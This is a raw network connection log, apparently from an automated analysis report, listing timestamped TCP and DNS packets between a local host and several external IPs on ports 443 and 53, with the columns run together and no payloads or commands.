                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.001596928 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.001633883 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.001648903 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.001708984 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.001730919 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.001780033 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.042459011 CET4436224413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.042484999 CET4436224413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.042546034 CET62244443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.042573929 CET4436224413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.042678118 CET62244443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.044198036 CET62244443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.044203997 CET4436224413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.044218063 CET62244443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.044373035 CET4436224413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.044404030 CET4436224413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.044449091 CET62244443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.067085981 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.067130089 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.067205906 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.070516109 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.070528984 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.180274010 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182219982 CET62245443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182241917 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182581902 CET62245443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182588100 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182704926 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182735920 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182782888 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182804108 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182817936 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182820082 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182843924 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182871103 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182982922 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.182998896 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.183008909 CET62243443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.183015108 CET4436224313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.186120033 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.186156034 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.186218023 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.190206051 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.190222979 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.487349987 CET4436224613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.487984896 CET62246443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.488012075 CET4436224613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.488487959 CET62246443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.488493919 CET4436224613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.645900965 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.645966053 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646260023 CET62245443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646294117 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646387100 CET62245443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646399975 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646408081 CET62245443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646805048 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646891117 CET4436224513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.646945953 CET62245443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.649655104 CET62250443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.649719000 CET4436225013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.649785995 CET62250443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.649943113 CET62250443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.649957895 CET4436225013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.939923048 CET4436224613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.943681955 CET4436224613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.945480108 CET62246443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.945480108 CET62246443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.945480108 CET62246443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.948328972 CET62251443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.948371887 CET4436225113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.948457003 CET62251443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.948577881 CET62251443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:08.948589087 CET4436225113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.156011105 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.157813072 CET62247443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.157835007 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.158282042 CET62247443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.158286095 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.259499073 CET62246443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.259536982 CET4436224613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.600749016 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.600814104 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.600934982 CET62247443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.601155996 CET62247443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.601176977 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.601187944 CET62247443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.601193905 CET4436224713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.604214907 CET62252443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.604259014 CET4436225213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.604346037 CET62252443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.604506969 CET62252443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.604525089 CET4436225213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.855509996 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.855967045 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.856009007 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.857459068 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.857481956 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.912240028 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.912734985 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.912765980 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.913368940 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:09.913373947 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.297859907 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.301896095 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.301968098 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.302051067 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.302051067 CET62248443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.302077055 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.302088976 CET4436224813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.304987907 CET62253443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.305033922 CET4436225313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.305208921 CET62253443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.305393934 CET62253443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.305402994 CET4436225313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.346904993 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.347069979 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.347115993 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.347460985 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.347460985 CET62249443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.347482920 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.347495079 CET4436224913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.352330923 CET62254443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.352381945 CET4436225413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.355324984 CET62254443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.355324984 CET62254443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.355370045 CET4436225413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.506237030 CET4436225013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.506756067 CET62250443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.506791115 CET4436225013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.507236004 CET62250443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:40:10.507241964 CET4436225013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:03.057374001 CET6247553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:03.195478916 CET53624751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:05.219243050 CET5561653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:05.556237936 CET53556161.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.276200056 CET6012653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.276727915 CET5098153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.394066095 CET53554661.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.403970957 CET53536211.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.413795948 CET53601261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.413911104 CET53509811.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:24.559639931 CET53587061.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:26.426906109 CET53627731.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.197287083 CET6103553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.197779894 CET5456853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.335916042 CET53545681.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:38.724714041 CET5695853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:38.725002050 CET4916153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.099510908 CET5599453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.099880934 CET6035753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.327764988 CET53603571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.415492058 CET53559941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863009930 CET6294953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863146067 CET5751453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863470078 CET6497553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863631964 CET5265453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.871835947 CET5230553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.872083902 CET5410353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.000917912 CET53629491.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.000931025 CET53575141.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.001224995 CET53526541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.001405001 CET53649751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.009190083 CET53523051.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.009533882 CET53541031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.716500998 CET5881553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.716686010 CET5988053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.741601944 CET5656753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.741799116 CET5959053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.755563974 CET6453653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.756048918 CET6168053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.853707075 CET53588151.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.854429960 CET53598801.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.861432076 CET5533553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.861712933 CET5285353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.996802092 CET5914153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.996936083 CET6257453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:42.000103951 CET53528531.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:42.135745049 CET53625741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:43.746269941 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:43.972485065 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.047647953 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.277193069 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.647763014 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.868530035 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.868650913 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.869962931 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.873307943 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.873394966 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.874806881 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.876279116 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.877676010 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.877839088 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.928775072 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.934988976 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:44.963543892 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.068958044 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.068979979 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.068994045 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.069013119 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.071393013 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.073658943 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.074076891 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.075548887 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.191287041 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.191427946 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.191432953 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.191443920 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.195096970 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.199182034 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.199636936 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.201838970 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.206998110 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.209469080 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.209486961 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.209594011 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.209955931 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.210413933 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.244460106 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.247749090 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.249900103 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.273921967 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.274754047 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.400980949 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.401061058 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.401185036 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.401253939 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.401257992 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.401527882 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.401602983 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.402178049 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.427728891 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.430670023 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.468823910 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.524066925 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.569912910 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.725327015 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:45.751097918 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.590922117 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.591053009 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.646500111 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.646958113 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.736675024 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.737018108 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.738442898 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.738744974 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.906214952 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.908046007 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.908140898 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.908492088 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.909574986 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.909842968 CET56857443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.961785078 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.962542057 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.963191032 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:47.964930058 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.052036047 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.052758932 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.053636074 CET44363229172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.054307938 CET63229443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.066143036 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.066157103 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.066251040 CET44349723172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.069617033 CET49723443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.218225956 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.218650103 CET56857443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.829314947 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:48.829417944 CET56857443192.168.2.10104.70.121.51
